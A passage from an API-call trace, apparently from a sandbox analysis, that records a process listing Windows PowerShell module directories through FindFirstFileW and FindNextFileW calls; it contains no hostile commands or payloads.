nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0182.343] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dda10 | out: lpFindFileData=0x1b7dda10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0182.343] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dda10 | out: lpFindFileData=0x1b7dda10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.343] FindClose (in: hFindFile=0x1a9b6720 | out: hFindFile=0x1a9b6720) returned 1 [0182.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddc70) returned 1 [0182.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddc30) returned 1 [0182.343] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psd1")) returned 0xffffffff [0182.343] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psm1")) returned 0xffffffff [0182.383] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.cdxml")) returned 0xffffffff [0182.383] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.xaml")) returned 0xffffffff [0182.383] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.dll")) returned 0xffffffff [0182.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddcc0) returned 1 [0182.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x1b7dd7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0182.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", nBufferLength=0x105, lpBuffer=0x1b7dd750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpFilePart=0x0) returned 0x33 [0182.388] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\*", lpFindFileData=0x1b7dd960 | out: lpFindFileData=0x1b7dd960*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6b40 [0182.389] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.389] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0182.389] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0182.389] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0182.389] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0182.389] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0182.390] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0182.390] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0182.390] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0182.390] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0182.390] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0182.391] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0182.391] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0182.391] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0182.391] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0182.391] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0182.391] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0182.391] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0182.392] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0182.392] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0182.392] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0182.392] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0182.392] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0182.392] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0182.392] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0182.393] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0182.393] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0182.393] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0182.393] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0182.393] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0182.393] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0182.394] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0182.394] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0182.394] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0182.394] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0182.394] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0182.395] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0182.395] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0182.395] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0182.395] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, 